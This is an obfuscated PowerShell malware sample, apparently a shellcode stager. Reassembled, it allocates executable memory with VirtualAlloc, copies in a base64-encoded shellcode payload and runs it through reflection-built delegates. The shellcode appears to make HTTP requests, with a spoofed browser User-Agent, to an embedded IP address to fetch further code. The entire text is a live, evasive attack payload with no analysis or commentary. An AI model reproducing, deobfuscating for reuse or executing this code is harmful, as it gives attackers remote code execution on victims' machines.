((("{73}{14}{76}{83}{21}{64}{56}{25}{62}{0}{33}{95}{98}{5}{57}{2}{48}{4}{34}{67}{94}{23}{66}{15}{77}{9}{104}{100}{92}{101}{3}{26}{65}{59}{49}{7}{31}{8}{44}{93}{86}{102}{97}{13}{96}{20}{22}{17}{50}{38}{87}{1}{74}{32}{81}{54}{39}{88}{10}{37}{90}{6}{24}{41}{36}{53}{70}{40}{61}{99}{19}{75}{89}{42}{45}{43}{103}{35}{58}{47}{82}{52}{51}{79}{28}{71}{68}{46}{27}{72}{60}{11}{91}{30}{12}{18}{80}{84}{29}{78}{16}{85}{55}{63}{69}"-f 'var_module, rNtvar_procedure)		
	rNtvar_uns','ANqM+NqMx/1','NqM+NqMddressfW9, [Type[]] NqM+NqM@(fW9System.Runt','n.DefineDynNqM+NqMamicAssembly((New-Object System.Reflec','eturn rNtvar_gpa.Invoke(rNtnull, @([SNqM+NqMys','NqMdsfNqM+NqMW9)
	rNtvar_gpa = rNtvar_unsafe_native_methods.GetMethod','NqMhOH8oDA','NqM+NqMegate])
	rNtvar_type_builder.DefineCon','9, [System.Reflection.CallingConventioNqM+NqMns','Ntvar_parameters','dRVlBot1fgC//VvwAvANqM+NqMAA5x3UHWFDpe////zH/6ZEBAADpyQEAAOhv////L2YNqM+NqM2ekYAsvBYNqM','nNqM+NqMc_get_delegatNqM+NqMe_tNqM+NqMype @([IntPtr]) ([Void])))
rNt',' -eq 8) {NqM+N','+NqM[SyNqM+NqMstem.ConveNqM+NqMrt]::FromBase64String(fW9/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoNqM+NqMD7dKJjH/NqM+NqMMcCsPGF8AiwgNqM+Nq','9X{','nsafe_native_methNqM+NqMods.GetMethod(fW9GetNqM+NqMModuleHandlefW9)).NqM+NqMInvoke(rNtnulNqM+NqMl, @(rNNqM+NqMtvar_module)))), rNtvaNqM+NqMr_procedure))
}

function func_gNqM+NqMet_delegate_typ','iIT} sKC .(09X{2}{1}{0}09X -f fW9bfW9,fWNqM+NqM9it-jofW9,fW9wafW9) sKC &(09X{0}{1}{2}09X-f fW9RecfNqM+NqMW9,fW9eivNqM+NqMe-fW9,fW9JobfW9)
}
else {
NqM+NqM	&(09X{0}{1}09X-f fW9IEfW9,fW9XfW9) rNt{DomFiit}
}
NqM)  -rEplaceNqMfW9NqM,[chAr]39  -cRepLace ([chAr]48+[chAr]57+[chAr]88),[chAr]34-rEplace([chAr]','EmLNI','qM
	&(09X{2}{0}{1}09X-','VUItxkaL7aoZVsBS+DIHQvXegD3MuvNqM+NqMlHgvhLRraDPE3x7PEANXpo30ib+yvzfVeOMuygyw2gDYtfILu1jdOJX3T96bV/MENSRidB0fAoY0ZymOa252R1dEd3Xrc5GQ','NAcfi8FJXi1IQi0I8Ad','NqMW','CLQHiNqM+NqMFwHRKAdBQi0gYi1ggAdPjP','pServices.Handl','b','am (','tioN','sNqM','de, 0, NqM+NqMrNtvar_buffer,NqM+NqM rNtvar_cod','X-ffW9EXfW9,fW9IfW9) rNt{a} } -','( .(fW9gIfW9) vAriABLe:4JZ ).VALuNqM+NqME::09XsImFiZe09X','structor(fW9RTSpNqM+NqMecialName, HideBySig, PublicNqM+NqMfW','aP','afe_native_methods = ([AppDomain]::CurrentDomain.GetNqM+NqMAs','tem.Runtime.In','M[IntPtr], [UInt32], [UInt32], [UInt32]) ([IntNqM+NqMPtr])))
rNtvar_buffer = r','Xgm9g83YHlt0GyP83XQAJNqM+NqMlwwq1eiZH1lOhsNqM+NqMHnvIMkAQE4uEoIgJWABVc2VyLUFnZW50','+NqMI0rxFUyjNP','xLi1gcA','O//VicaDw1BogDMNqM+NqMAAIngagRQah9WaHVGnob/1V8x/1dXav9TVmgtBhh7/9WFwA+EygEAADH/hfZ0BIn56wloqsXiXf/Vi','DsgVHJpZGVudC81LjA7IE1BVFA7IENqM+NqM1BVFApDQoAUcvAo0ZnDPNqM+NqMkfPyZm2mYNqM+NqMMnjR/gCNqM+NqMuxmDS/BEYrT7Qjka','+uGN3HzX8n8YZi','VhcB0xosHAcOFwHXlNqM+NqMWNqM+NqMMPoif3//zMNqM+NqM0NqM+NqMLjI0','Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegNqM+NqMate_type',']::Standard, rNtvar_parNqM+NqMameters).SetI','Ni4xNjEuMTU0AE0mZYo=fW9)

NqM+NqMrNtvar_va = [System.Runtime.InteropServices.','gth)

rNtvar_rNqM+NqMunme = [Sy','voke([IntPtr]::Zero, rNtvar_code.Leng','iNqM+NqMme.InteropServicNqM+NqMeNqM+NqMs.HNqM+NqMandleReffW9, fW9stringfW9))
	r','9, [System.MulticastDel','sB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiw','.Runtime.INqM+NqMn','SysteNqM+NqMm','OiBNb3ppbGxhLzNqM+NqMUuMCAoY29tcGF0aWJsZTsgTVNJRSA','XiZ/G/9VQ6YwAAANqM+NqMBbMdNqM+NqMJSaAAyoIRSUlJTUlBo61NqM+NqMUu','qM,[chAr]92  -cRepLace  ([chAr]109+[chAr]70+[chAr]105),[chAr]96 -cRepLace NqMrNtNqM','Mon 2

rNt{dOmFiIt} = @fW9
function func_get_proc_address {
	Par','(fW9GetProcA','Ntvar_va.In','qM+NqMem.Reflection.Emit.AssemblyNqM+NqMBuilderAccess]::Run).DefineDynamicModule(fW9InMemoryModulefW9, rNtfalse).DefinNqM+NqMeType(fW9MNqM+NqMyDelegateTypefW9, fW9Class, Public, Sealed, AnsiClass, AutoClassfW','nPointer(rNtvar_buffer, (fu','fHlvc8oJAOgxo8','rNtNqM+NqM',',[chAr]36) 0J9m& ( yU0VerbOseprEFEREnCe.tOStrInG()[1,3]+NqMxNqM-JOinNqMNq','9,fW9Set-fW9,fW9SfW9) -VersiNqM+Nq','qM+NqMn.AssemblyName(fW9ReflectedDNqM+NqMelegatefW9)), [SystN','eRef((NNqM+NqMew-Object IntPtr), (rNtvar_u','teropServices.HandleRef](NeNqM+NqMw-Object System.Runti','+NqMn','M)','5LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NqM+NqMN','e.leNqM','+NqMtem.Runtime.InteropServices.Marshal]::GetDelegateFoNqM+NqMrFunctioNqM+NqM',' ((NqM rNt{4NqM+NqMmFijz}  =NqM+NqM [Type](0','dXV1dXaDpWeNqM+NqMaf/1emkAAAAWzHJUVFqA1FR','CUalBq2VYuFEfaMKAITA0ruIAf+8RccfHTqNqM+NqMYLFw2DhNnQxIC32mYAaNqM+NqMPC1o','0}{1}{2}09X -F fW9iNtNqM+NqMfW9,fW9PfW9,fW9TRfW9)NqM+NqM; .NqM+NqM(NqM+NqM09X{2}{3}{1}{','e {
	Param (
		[Parameter(Position = 0, Mandatory = rNtTrue)] [Type[]] r','RunANqM+NqMs32 -Argument rNt{DomF','teropServicNqM+NqMes.Marshal]::Copy(NqM+NqMrNtNqM+NqMvar_co','f fW9tartfW9,fNqM+NqMW9-jobNqM+NqMfW9,fW9sfW9) { param','sgAABTUGh','th, 0x3000, 0x40)
[','0}09X -ffW9tModefW9,fW9tricfNqM+','(rNt{A}) &(NqM+NqM09X{1}{0NqM+NqM}09','115+[chAr]75+[chAr]67),[chAr]124-cRepLaceNqMB80N','.','NqM+NqMdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6AAAAA','cFoRSFeMf/VMf9Xag','lb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk7kAAAAAAdlRU4nnV2gAIAAAU1ZoEpaJ4v/','UIrjUkoT7NqM+','var_runme.Invoke([IntPtNqM+NqMr]::Zero)
fW9@

If ( ','NqM	)

	rNtvar_type_builder NqM+NqM=NqM+N','mplementatioNqM+NqMnFlags(fW9Runtime, ManagedfW9)
NqM+NqM	rNtvar_type_builder','me.Intero','sem','MwNqM+NqMc8','Byte[]]rNtvar_code = NqM','blNqM+NqMies() NqM+NqMsKC Where-Object { rNt_.GlobalAssemblyCache -And rNt_.Location.Split(fW9B80B80fW9)[-1].Equals(fW9SNqM+NqMystem.dllfW9) }).GetType(fW9Microsoft.Win32.UnsafeNativeMethoNqM+','kJ8ldaFNqM+NqMhcsBin4bOxFIi8IBmvlMPtdHUGFn2XYvWa','[Void]
NqM+','qM [AppDomain]::CurrentDomai','DefineMethod(fW9InvokefW9, fW9NqM+NqMPublic, HideBySig, NewSNqM+NqMlot, VirtualfNqM+NqMW9, rNtvar_return_type, rNtvar_parameters).SetImplementationFlags(fW9Runtime,NqM+NqM ManaNqM+NqMgedfW9)

	return rNtvar_NqM+NqMtype_builder.CreateType()
}

[',' @(NqM+Nq',',
		[PNqM+NqMarameter(Position = 1)] [Type] rNtvar_return_type = ')) -CRePLace'0J9m',[cHar]124-rEPlacE  'NqM',[cHar]39  -CRePLace 'yU0',[cHar]36) | &( $ENv:COmsPEC[4,15,25]-JOIn'')
